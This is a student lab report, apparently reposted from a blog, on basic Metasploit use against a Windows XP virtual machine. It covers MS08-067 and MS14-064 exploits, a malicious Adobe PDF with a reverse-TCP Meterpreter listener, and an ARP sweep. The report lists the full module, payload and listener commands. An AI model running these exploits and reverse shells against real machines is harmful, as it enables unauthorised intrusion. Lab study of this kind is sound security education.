码迷,mamicode.com
首页 > 其他好文 > 详细

2019-2020-2 20175228 李玥琛 《网络对抗技术》Exp6 MSF基础应用

时间:2020-05-27 01:17:56      阅读:132      评论:0      收藏:0      [点我收藏+]

标签:体会   ann   xpl   tcp   基础问题   tcp连接   png   如何   too   

1.1一个主动攻击实践

kali的IP:192.168.62.128,xp的IP:192.168.62.155
技术图片

xp ping kali
技术图片

启动msfconsole,然后输入search ms08_067查找该漏洞使用的攻击模块,攻击模块为exploit/windows/smb/ms08_067_netapi
技术图片

输入指令 use exploit/windows/smb/ms08_067_netapi 进入攻击模块,使用 show payloads,查看能够使用的payloads
技术图片

使用指令 set payload generic/shell_reverse_tcp 设置payload为反向tcp连接,使用 show options 查看可以设置的参数
技术图片

设置参数
技术图片

回车返回,ipconfig /all
技术图片

1.2 一个针对浏览器的攻击

启动msfconsole,然后输入search ms14_064 查找该漏洞使用的攻击模块,攻击模块为windows/browser/ms14_064_ole_code_execution
技术图片

使用use windows/browser/ms14_064_ole_code_execution设置模块,使用 set payload windows/meterpreter/reverse_tcp 设置payload,使用指令 show options 查看要设置的参数
技术图片

设置参数
技术图片

在xp浏览器输入local ip
技术图片

技术图片

1.3 一个针对客户端的攻击

启动msfconsole,然后输入search adobe查找该漏洞使用的攻击模块,攻击模块为exploit/windows/fileformat/adobe_toolbutton;
使用use exploit/windows/fileformat/adobe_toolbutton设置模块,使用 set payload windows/meterpreter/reverse_tcp 设置payload,使用指令 show options 查看要设置的参数
技术图片

设置参数
技术图片

在linux中另外打开一个终端,msfconsole进入控制台;
输入use exploit/multi/handler使用监听模块,设置payload;
使用和生成后门程序时相同的payload:set payload windows/meterpreter/reverse_tcp;
set LHOST 192.168.170.128;
端口号也相同:set LPORT 5228;
设置完成后,exploit开始监听
技术图片

靶机中打开msf.pdf文件,靶机上钩,攻击成功;kali中发现回连成功;输入ipconfig
技术图片

1.4 成功应用任何一个辅助模块

启动msfconsole,使用use auxiliary/scanner/discovery/arp_sweep 设置模块,使用set RHOSTS 192.168.135.162设置参数,使用set THREADS 30设置扫描速度
技术图片

2.1.基础问题回答

用自己的话解释什么是exploit,payload,encode:exploit是攻击的位置,payload是载荷,包含了攻击的代码,是攻击的主要部分,encode对代码进行伪装

2.2.实践总结与体会

这次的实验是我做下来最简单的一个实验,但是却包含了各种攻击,有些攻击可以说让人难以预料,不知该如何设防,也只能在我们日常使用电脑时多加注意了。

2.3.离实战还缺些什么技术或步骤?

我觉得攻击的有些步骤过于僵化,条件限制较多,光是关闭防火墙这一条,可攻击到的电脑就少了许多,现在的电脑,除了我们做实验的,谁不开着防火墙,安着360;再就是系统的限制,中文版的xp甚至无法利用漏洞来进行攻击,更何况现在普遍应用到的win10。

2019-2020-2 20175228 李玥琛 《网络对抗技术》Exp6 MSF基础应用

标签:体会   ann   xpl   tcp   基础问题   tcp连接   png   如何   too   

原文地址:https://www.cnblogs.com/20175228lyc/p/12969687.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!